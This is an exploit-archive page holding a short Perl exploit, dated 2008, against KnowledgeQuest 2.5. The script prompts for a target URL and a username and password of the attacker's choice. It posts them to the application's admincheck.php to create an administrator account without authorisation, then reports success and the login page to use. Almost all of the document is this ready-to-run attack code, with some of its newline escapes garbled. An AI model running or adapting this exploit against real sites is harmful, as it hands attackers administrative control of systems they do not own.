[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : KnowledgeQuest 2.5 Arbitrary Add Admin Exploit
# Published : 2008-04-09
# Author : t0pP8uZz
# Previous Title : phpBB Add-on Fishing Cat Portal Remote File Inclusion Exploit
# Next Title : Free Photo Gallery Site Script (path) File Disclosure Vulnerability
#!/usr/bin/perl
use strict;
use LWP::UserAgent;
print "-+------------------------------------------+-n";
print "-+- KnowledgeQuest 2.5 Arbitrary Add Admin -+-n";
print "-+------------------------------------------+-n";
print "-+- Discovered && Coded By t0pP8uzz -+-n";
print "-+- This Exploit will craft a evilpacket -+-n";
print "-+- which will add a admin account -+-n";
print "-+------------------------------------------+-n";
print "Enter URL: ";
chomp(my $url=<STDIN>);
print "Enter Username (you will login with this): ";
chomp(my $usr=<STDIN>);
print "Enter Password (you will login with this): ";
chomp(my $pwd=<STDIN>);
my $ua = LWP::UserAgent->new( agent=> 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)' );
my $res = $ua->post( $url."/admincheck.php", {'username' => $usr, 'password' => $pwd, 'repas' => $pwd} );
if($res->is_success) {
if($res->content =~ /taken by another user/i) { print "nnExploit Failed! Reason: username already taken!"; exit; }
print "nnExploit Success! Login to ".$url."administratorlogin.php with username: ".$usr." and password: ".$pwd."n";
}
# www.Syue.com [2008-04-09]